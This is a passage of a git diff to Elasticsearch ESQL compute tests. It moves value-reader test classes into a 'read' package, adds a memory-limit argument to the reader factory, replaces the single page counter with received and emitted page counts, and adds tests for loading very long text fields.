a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java index a8cb202f2be2c..91b8de1a08573 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java @@ -24,6 +24,7 @@ import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; import 
org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java index db60d3cd19cb3..7ba1f9790ecbe 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java @@ -21,6 +21,7 @@ import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.test.OperatorTestCase; @@ -52,7 +53,7 @@ public class LuceneTopNSourceOperatorScoringTests extends LuceneTopNSourceOperat private IndexReader reader; @After - private void closeIndex() throws IOException { + public void closeScoringIndex() throws IOException { IOUtils.close(reader, directory); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java index 0c9bf676e0547..26540caee0b1f 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java @@ -24,6 +24,7 @@ import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.test.AnyOperatorTestCase; @@ -57,7 +58,7 @@ public class LuceneTopNSourceOperatorTests extends AnyOperatorTestCase { private IndexReader reader; @After - private void closeIndex() throws IOException { + public void closeIndex() throws IOException { IOUtils.close(reader, directory); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java index 15ae1d506a2fe..3a3fac1afc595 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java @@ -34,6 +34,9 @@ import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.TimeSeriesExtractFieldOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; +import 
org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.DriverStatus; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValueSourceReaderTypeConversionTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValueSourceReaderTypeConversionTests.java similarity index 97% rename from x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValueSourceReaderTypeConversionTests.java rename to x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValueSourceReaderTypeConversionTests.java index 88211a9170034..41941c718bb0e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValueSourceReaderTypeConversionTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValueSourceReaderTypeConversionTests.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.apache.lucene.document.Document; import org.apache.lucene.document.DoubleDocValuesField; @@ -34,6 +34,7 @@ import org.elasticsearch.common.collect.Iterators; import org.elasticsearch.common.lucene.Lucene; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.compute.data.Block; @@ -48,6 +49,12 @@ import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.DataPartitioning; +import org.elasticsearch.compute.lucene.LuceneOperator; +import org.elasticsearch.compute.lucene.LuceneSliceQueue; +import org.elasticsearch.compute.lucene.LuceneSourceOperator; +import org.elasticsearch.compute.lucene.LuceneSourceOperatorTests; +import org.elasticsearch.compute.lucene.ShardContext; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.DriverRunner; @@ -234,12 +241,17 @@ private static Operator.OperatorFactory factory( ElementType elementType, BlockLoader loader ) { - return new ValuesSourceReaderOperator.Factory(List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { - if (shardIdx < 0 || shardIdx >= INDICES.size()) { - fail("unexpected shardIdx [" + shardIdx + "]"); - } - return loader; - })), shardContexts, 0); + return new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), + List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { + if (shardIdx < 0 || shardIdx >= INDICES.size()) { + fail("unexpected shardIdx [" + shardIdx + "]"); + } + return loader; + })), + shardContexts, + 0 + ); } protected SourceOperator simpleInput(DriverContext context, int size) { @@ -486,6 +498,7 @@ public void testManySingleDocPages() { // TODO: Add index2 operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(testCase.info, fieldInfo(mapperService(indexKey).fieldType("key"), ElementType.INT)), shardContexts, 0 @@ -593,6 +606,7 @@ private void loadSimpleAndAssert( List operators = new ArrayList<>(); operators.add( new ValuesSourceReaderOperator.Factory( + 
ByteSizeValue.ofGb(1), List.of( fieldInfo(mapperService("index1").fieldType("key"), ElementType.INT), fieldInfo(mapperService("index1").fieldType("indexKey"), ElementType.BYTES_REF) @@ -607,7 +621,9 @@ private void loadSimpleAndAssert( cases.removeAll(b); tests.addAll(b); operators.add( - new ValuesSourceReaderOperator.Factory(b.stream().map(i -> i.info).toList(), shardContexts, 0).get(driverContext) + new ValuesSourceReaderOperator.Factory(ByteSizeValue.ofGb(1), b.stream().map(i -> i.info).toList(), shardContexts, 0).get( + driverContext + ) ); } List results = drive(operators, input.iterator(), driverContext); @@ -629,7 +645,9 @@ private void loadSimpleAndAssert( } } for (Operator op : operators) { - assertThat(((ValuesSourceReaderOperator) op).status().pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); } assertDriverContext(driverContext); } @@ -709,15 +727,16 @@ private void testLoadAllStatus(boolean allInOnePage) { Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING ); List operators = cases.stream() - .map(i -> new ValuesSourceReaderOperator.Factory(List.of(i.info), shardContexts, 0).get(driverContext)) + .map(i -> new ValuesSourceReaderOperator.Factory(ByteSizeValue.ofGb(1), List.of(i.info), shardContexts, 0).get(driverContext)) .toList(); if (allInOnePage) { input = List.of(CannedSourceOperator.mergePages(input)); } drive(operators, input.iterator(), driverContext); for (int i = 0; i < cases.size(); i++) { - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) operators.get(i).status(); - assertThat(status.pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) operators.get(i).status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); FieldCase fc = cases.get(i); fc.checkReaders.check(fc.info.name(), allInOnePage, input.size(), totalSize, status.readersBuilt()); } @@ -1380,6 +1399,7 @@ public void testNullsShared() { simpleInput(driverContext, 10), List.of( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( new ValuesSourceReaderOperator.FieldInfo("null1", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS), new ValuesSourceReaderOperator.FieldInfo("null2", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS) @@ -1414,6 +1434,7 @@ public void testDescriptionOfMany() throws IOException { List cases = infoAndChecksForEachType(ordering, ordering); ValuesSourceReaderOperator.Factory factory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), cases.stream().map(c -> c.info).toList(), List.of(new ValuesSourceReaderOperator.ShardContext(reader(indexKey), () -> SourceLoader.FROM_STORED_SOURCE, 0.2)), 0 @@ -1459,6 +1480,7 @@ public void testManyShards() throws IOException { // TODO add index2 MappedFieldType ft = mapperService(indexKey).fieldType("key"); var readerFactory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(new ValuesSourceReaderOperator.FieldInfo("key", ElementType.INT, shardIdx -> { seenShards.add(shardIdx); return ft.blockLoader(blContext()); @@ -1641,6 +1663,11 @@ public org.elasticsearch.compute.data.Block eval(Page page) { return blockConverter.convert(block); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override 
public void close() {} }; @@ -1666,8 +1693,8 @@ public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) throws } return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - Block block = reader.read(factory, docs); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + Block block = reader.read(factory, docs, offset); Page page = new Page((org.elasticsearch.compute.data.Block) block); return convertEvaluator.eval(page); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorStatusTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatusTests.java similarity index 60% rename from x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorStatusTests.java rename to x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatusTests.java index af1463b88c62c..f81398eb67695 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorStatusTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatusTests.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.Writeable; @@ -18,9 +18,9 @@ import static org.hamcrest.Matchers.equalTo; -public class ValuesSourceReaderOperatorStatusTests extends AbstractWireSerializingTestCase { - public static ValuesSourceReaderOperator.Status simple() { - return new ValuesSourceReaderOperator.Status(Map.of("ReaderType", 3), 1022323, 123, 111, 222, 1000); +public class ValuesSourceReaderOperatorStatusTests extends AbstractWireSerializingTestCase { + public static ValuesSourceReaderOperatorStatus simple() { + return new ValuesSourceReaderOperatorStatus(Map.of("ReaderType", 3), 1022323, 123, 200, 111, 222, 1000); } public static String simpleToJson() { @@ -32,7 +32,8 @@ public static String simpleToJson() { "values_loaded" : 1000, "process_nanos" : 1022323, "process_time" : "1ms", - "pages_processed" : 123, + "pages_received" : 123, + "pages_emitted" : 200, "rows_received" : 111, "rows_emitted" : 222 }"""; @@ -43,16 +44,17 @@ public void testToXContent() { } @Override - protected Writeable.Reader instanceReader() { - return ValuesSourceReaderOperator.Status::new; + protected Writeable.Reader instanceReader() { + return ValuesSourceReaderOperatorStatus::readFrom; } @Override - public ValuesSourceReaderOperator.Status createTestInstance() { - return new ValuesSourceReaderOperator.Status( + public ValuesSourceReaderOperatorStatus createTestInstance() { + return new ValuesSourceReaderOperatorStatus( randomReadersBuilt(), randomNonNegativeLong(), randomNonNegativeInt(), + randomNonNegativeInt(), randomNonNegativeLong(), randomNonNegativeLong(), randomNonNegativeLong() @@ -69,22 +71,32 @@ private Map randomReadersBuilt() { } @Override - protected ValuesSourceReaderOperator.Status mutateInstance(ValuesSourceReaderOperator.Status instance) throws IOException { + protected ValuesSourceReaderOperatorStatus mutateInstance(ValuesSourceReaderOperatorStatus instance) throws IOException { Map readersBuilt = instance.readersBuilt(); long processNanos = instance.processNanos(); - int 
pagesProcessed = instance.pagesProcessed(); + int pagesReceived = instance.pagesReceived(); + int pagesEmitted = instance.pagesEmitted(); long rowsReceived = instance.rowsReceived(); long rowsEmitted = instance.rowsEmitted(); long valuesLoaded = instance.valuesLoaded(); - switch (between(0, 5)) { + switch (between(0, 6)) { case 0 -> readersBuilt = randomValueOtherThan(readersBuilt, this::randomReadersBuilt); case 1 -> processNanos = randomValueOtherThan(processNanos, ESTestCase::randomNonNegativeLong); - case 2 -> pagesProcessed = randomValueOtherThan(pagesProcessed, ESTestCase::randomNonNegativeInt); - case 3 -> rowsReceived = randomValueOtherThan(rowsReceived, ESTestCase::randomNonNegativeLong); - case 4 -> rowsEmitted = randomValueOtherThan(rowsEmitted, ESTestCase::randomNonNegativeLong); - case 5 -> valuesLoaded = randomValueOtherThan(valuesLoaded, ESTestCase::randomNonNegativeLong); + case 2 -> pagesReceived = randomValueOtherThan(pagesReceived, ESTestCase::randomNonNegativeInt); + case 3 -> pagesEmitted = randomValueOtherThan(pagesEmitted, ESTestCase::randomNonNegativeInt); + case 4 -> rowsReceived = randomValueOtherThan(rowsReceived, ESTestCase::randomNonNegativeLong); + case 5 -> rowsEmitted = randomValueOtherThan(rowsEmitted, ESTestCase::randomNonNegativeLong); + case 6 -> valuesLoaded = randomValueOtherThan(valuesLoaded, ESTestCase::randomNonNegativeLong); default -> throw new UnsupportedOperationException(); } - return new ValuesSourceReaderOperator.Status(readersBuilt, processNanos, pagesProcessed, rowsReceived, rowsEmitted, valuesLoaded); + return new ValuesSourceReaderOperatorStatus( + readersBuilt, + processNanos, + pagesReceived, + pagesEmitted, + rowsReceived, + rowsEmitted, + valuesLoaded + ); } } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorTests.java similarity index 88% rename from x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorTests.java rename to x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorTests.java index 1550b6dc013ab..19a645c146242 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorTests.java @@ -5,7 +5,7 @@ * 2.0. 
*/ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.apache.lucene.document.Document; import org.apache.lucene.document.DoubleDocValuesField; @@ -18,6 +18,7 @@ import org.apache.lucene.index.IndexWriter; import org.apache.lucene.index.IndexWriterConfig; import org.apache.lucene.index.NoMergePolicy; +import org.apache.lucene.index.TieredMergePolicy; import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.store.Directory; import org.apache.lucene.tests.index.RandomIndexWriter; @@ -37,6 +38,7 @@ import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; import org.elasticsearch.compute.data.DocBlock; +import org.elasticsearch.compute.data.DocVector; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; import org.elasticsearch.compute.data.ElementType; @@ -45,6 +47,12 @@ import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.DataPartitioning; +import org.elasticsearch.compute.lucene.LuceneOperator; +import org.elasticsearch.compute.lucene.LuceneSliceQueue; +import org.elasticsearch.compute.lucene.LuceneSourceOperator; +import org.elasticsearch.compute.lucene.LuceneSourceOperatorTests; +import org.elasticsearch.compute.lucene.ShardContext; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -93,6 +101,7 @@ import static org.elasticsearch.test.MapMatcher.matchesMap; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.lessThanOrEqualTo; import static org.hamcrest.Matchers.not; @@ -144,12 +153,14 @@ public static Operator.OperatorFactory factory(IndexReader reader, MappedFieldTy } static Operator.OperatorFactory factory(IndexReader reader, String name, ElementType elementType, BlockLoader loader) { - return new ValuesSourceReaderOperator.Factory(List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { - if (shardIdx != 0) { - fail("unexpected shardIdx [" + shardIdx + "]"); - } - return loader; - })), + return new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), + List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { + if (shardIdx != 0) { + fail("unexpected shardIdx [" + shardIdx + "]"); + } + return loader; + })), List.of( new ValuesSourceReaderOperator.ShardContext( reader, @@ -176,6 +187,10 @@ private SourceOperator simpleInput(DriverContext context, int size, int commitEv } catch (IOException e) { throw new RuntimeException(e); } + return sourceOperator(context, pageSize); + } + + private SourceOperator sourceOperator(DriverContext context, int pageSize) { var luceneFactory = new LuceneSourceOperator.Factory( List.of(new LuceneSourceOperatorTests.MockShardContext(reader, 0)), ctx -> List.of(new LuceneSliceQueue.QueryAndTags(new MatchAllDocsQuery(), List.of())), @@ -205,6 +220,7 @@ private void initMapping() throws IOException { simpleField(b, "missing_text", "text"); b.startObject("source_text").field("type", "text").field("store", false).endObject(); b.startObject("mv_source_text").field("type", "text").field("store", false).endObject(); + 
b.startObject("long_source_text").field("type", "text").field("store", false).endObject(); b.startObject("stored_text").field("type", "text").field("store", true).endObject(); b.startObject("mv_stored_text").field("type", "text").field("store", true).endObject(); @@ -380,6 +396,37 @@ private IndexReader initIndex(Directory directory, int size, int commitEvery) th return DirectoryReader.open(directory); } + private IndexReader initIndexLongField(Directory directory, int size, int commitEvery, boolean forceMerge) throws IOException { + try ( + IndexWriter writer = new IndexWriter( + directory, + newIndexWriterConfig().setMergePolicy(new TieredMergePolicy()).setMaxBufferedDocs(IndexWriterConfig.DISABLE_AUTO_FLUSH) + ) + ) { + for (int d = 0; d < size; d++) { + XContentBuilder source = JsonXContent.contentBuilder(); + source.startObject(); + source.field("long_source_text", d + "#" + "a".repeat(100 * 1024)); + source.endObject(); + ParsedDocument doc = mapperService.documentParser() + .parseDocument( + new SourceToParse("id" + d, BytesReference.bytes(source), XContentType.JSON), + mapperService.mappingLookup() + ); + writer.addDocuments(doc.docs()); + + if (d % commitEvery == commitEvery - 1) { + writer.commit(); + } + } + + if (forceMerge) { + writer.forceMerge(1); + } + } + return DirectoryReader.open(directory); + } + @Override protected Matcher expectedDescriptionOfSimple() { return equalTo("ValuesSourceReaderOperator[fields = [long]]"); @@ -408,12 +455,6 @@ protected void assertSimpleOutput(List input, List results) { assertThat(sum, equalTo(expectedSum)); } - @Override - protected ByteSizeValue enoughMemoryForSimple() { - assumeFalse("strange exception in the test, fix soon", true); - return ByteSizeValue.ofKb(1); - } - public void testLoadAll() { DriverContext driverContext = driverContext(); loadSimpleAndAssert( @@ -453,6 +494,7 @@ public void testManySingleDocPages() { ); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(testCase.info, fieldInfo(mapperService.fieldType("key"), ElementType.INT)), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -491,16 +533,23 @@ public void testLoadAllInOnePageShuffled() { Page source = CannedSourceOperator.mergePages( CannedSourceOperator.collectPages(simpleInput(driverContext.blockFactory(), between(100, 5000))) ); - List shuffleList = new ArrayList<>(); - IntStream.range(0, source.getPositionCount()).forEach(i -> shuffleList.add(i)); - Randomness.shuffle(shuffleList); - int[] shuffleArray = shuffleList.stream().mapToInt(Integer::intValue).toArray(); - Block[] shuffledBlocks = new Block[source.getBlockCount()]; - for (int b = 0; b < shuffledBlocks.length; b++) { - shuffledBlocks[b] = source.getBlock(b).filter(shuffleArray); - } - source = new Page(shuffledBlocks); - loadSimpleAndAssert(driverContext, List.of(source), Block.MvOrdering.UNORDERED, Block.MvOrdering.UNORDERED); + loadSimpleAndAssert(driverContext, List.of(shuffle(source)), Block.MvOrdering.UNORDERED, Block.MvOrdering.UNORDERED); + } + + private Page shuffle(Page source) { + try { + List shuffleList = new ArrayList<>(); + IntStream.range(0, source.getPositionCount()).forEach(i -> shuffleList.add(i)); + Randomness.shuffle(shuffleList); + int[] shuffleArray = shuffleList.stream().mapToInt(Integer::intValue).toArray(); + Block[] shuffledBlocks = new Block[source.getBlockCount()]; + for (int b = 0; b < shuffledBlocks.length; b++) { + shuffledBlocks[b] = source.getBlock(b).filter(shuffleArray); + } + return new Page(shuffledBlocks); + } finally { + 
source.releaseBlocks(); + } } private static ValuesSourceReaderOperator.FieldInfo fieldInfo(MappedFieldType ft, ElementType elementType) { @@ -565,6 +614,7 @@ private void loadSimpleAndAssert( List operators = new ArrayList<>(); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(fieldInfo(mapperService.fieldType("key"), ElementType.INT)), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -583,6 +633,7 @@ private void loadSimpleAndAssert( tests.addAll(b); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), b.stream().map(i -> i.info).toList(), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -612,7 +663,9 @@ private void loadSimpleAndAssert( } } for (Operator op : operators) { - assertThat(((ValuesSourceReaderOperator) op).status().pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); } assertDriverContext(driverContext); } @@ -679,6 +732,7 @@ private void testLoadAllStatus(boolean allInOnePage) { List operators = cases.stream() .map( i -> new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(i.info), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -696,8 +750,9 @@ private void testLoadAllStatus(boolean allInOnePage) { } drive(operators, input.iterator(), driverContext); for (int i = 0; i < cases.size(); i++) { - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) operators.get(i).status(); - assertThat(status.pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) operators.get(i).status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); FieldCase fc = cases.get(i); fc.checkReaders.check(fc.info.name(), allInOnePage, input.size(), reader.leaves().size(), status.readersBuilt()); } @@ -863,6 +918,117 @@ private List infoAndChecksForEachType( return r; } + public void testLoadLong() throws IOException { + testLoadLong(false, false); + } + + public void testLoadLongManySegments() throws IOException { + testLoadLong(false, true); + } + + public void testLoadLongShuffled() throws IOException { + testLoadLong(true, false); + } + + public void testLoadLongShuffledManySegments() throws IOException { + testLoadLong(true, true); + } + + private void testLoadLong(boolean shuffle, boolean manySegments) throws IOException { + int numDocs = between(10, 500); + initMapping(); + reader = initIndexLongField(directory, numDocs, manySegments ? commitEvery(numDocs) : numDocs, manySegments == false); + + DriverContext driverContext = driverContext(); + List input = CannedSourceOperator.collectPages(sourceOperator(driverContext, numDocs)); + assertThat(reader.leaves(), hasSize(manySegments ? 
greaterThan(5) : equalTo(1))); + assertThat(input, hasSize(reader.leaves().size())); + if (manySegments) { + input = List.of(CannedSourceOperator.mergePages(input)); + } + if (shuffle) { + input = input.stream().map(this::shuffle).toList(); + } + boolean willSplit = loadLongWillSplit(input); + + Checks checks = new Checks(Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING, Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING); + + List cases = List.of( + new FieldCase( + mapperService.fieldType("long_source_text"), + ElementType.BYTES_REF, + checks::strings, + StatusChecks::longTextFromSource + ) + ); + // Build one operator for each field, so we get a unique map to assert on + List operators = cases.stream() + .map( + i -> new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), + List.of(i.info), + List.of( + new ValuesSourceReaderOperator.ShardContext( + reader, + () -> SourceLoader.FROM_STORED_SOURCE, + STORED_FIELDS_SEQUENTIAL_PROPORTIONS + ) + ), + 0 + ).get(driverContext) + ) + .toList(); + List result = drive(operators, input.iterator(), driverContext); + + boolean[] found = new boolean[numDocs]; + for (Page page : result) { + BytesRefVector bytes = page.getBlock(1).asVector(); + BytesRef scratch = new BytesRef(); + for (int p = 0; p < bytes.getPositionCount(); p++) { + BytesRef v = bytes.getBytesRef(p, scratch); + int d = Integer.valueOf(v.utf8ToString().split("#")[0]); + assertFalse("found a duplicate " + d, found[d]); + found[d] = true; + } + } + List missing = new ArrayList<>(); + for (int d = 0; d < numDocs; d++) { + if (found[d] == false) { + missing.add(d); + } + } + assertThat(missing, hasSize(0)); + assertThat(result, hasSize(willSplit ? greaterThanOrEqualTo(input.size()) : equalTo(input.size()))); + + for (int i = 0; i < cases.size(); i++) { + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) operators.get(i).status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), willSplit ? 
greaterThanOrEqualTo(input.size()) : equalTo(input.size())); + } + } + + private boolean loadLongWillSplit(List input) { + int nextDoc = -1; + for (Page page : input) { + DocVector doc = page.getBlock(0).asVector(); + for (int p = 0; p < doc.getPositionCount(); p++) { + if (doc.shards().getInt(p) != 0) { + return false; + } + if (doc.segments().getInt(p) != 0) { + return false; + } + if (nextDoc == -1) { + nextDoc = doc.docs().getInt(p); + } else if (doc.docs().getInt(p) != nextDoc) { + return false; + } + nextDoc++; + } + } + return true; + } + record Checks(Block.MvOrdering booleanAndNumericalDocValuesMvOrdering, Block.MvOrdering bytesRefDocValuesMvOrdering) { void longs(Block block, int position, int key) { LongVector longs = ((LongBlock) block).asVector(); @@ -1076,6 +1242,10 @@ static void textFromSource(boolean forcedRowByRow, int pageCount, int segmentCou source("source_text", "Bytes", forcedRowByRow, pageCount, segmentCount, readers); } + static void longTextFromSource(boolean forcedRowByRow, int pageCount, int segmentCount, Map readers) { + source("long_source_text", "Bytes", forcedRowByRow, pageCount, segmentCount, readers); + } + static void textFromStored(boolean forcedRowByRow, int pageCount, int segmentCount, Map readers) { stored("stored_text", "Bytes", forcedRowByRow, pageCount, segmentCount, readers); } @@ -1448,6 +1618,7 @@ public void testNullsShared() { simpleInput(driverContext.blockFactory(), 10), List.of( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( new ValuesSourceReaderOperator.FieldInfo("null1", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS), new ValuesSourceReaderOperator.FieldInfo("null2", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS) @@ -1482,13 +1653,13 @@ public void testNullsShared() { } public void testSequentialStoredFieldsTooSmall() throws IOException { - testSequentialStoredFields(false, between(1, ValuesSourceReaderOperator.SEQUENTIAL_BOUNDARY - 1)); + testSequentialStoredFields(false, between(1, ValuesFromSingleReader.SEQUENTIAL_BOUNDARY - 1)); } public void testSequentialStoredFieldsBigEnough() throws IOException { testSequentialStoredFields( true, - between(ValuesSourceReaderOperator.SEQUENTIAL_BOUNDARY, ValuesSourceReaderOperator.SEQUENTIAL_BOUNDARY * 2) + between(ValuesFromSingleReader.SEQUENTIAL_BOUNDARY, ValuesFromSingleReader.SEQUENTIAL_BOUNDARY * 2) ); } @@ -1499,6 +1670,7 @@ private void testSequentialStoredFields(boolean sequential, int docCount) throws assertThat(source, hasSize(1)); // We want one page for simpler assertions, and we want them all in one segment assertTrue(source.get(0).getBlock(0).asVector().singleSegmentNonDecreasing()); Operator op = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( fieldInfo(mapperService.fieldType("key"), ElementType.INT), fieldInfo(storedTextField("stored_text"), ElementType.BYTES_REF) @@ -1519,7 +1691,7 @@ private void 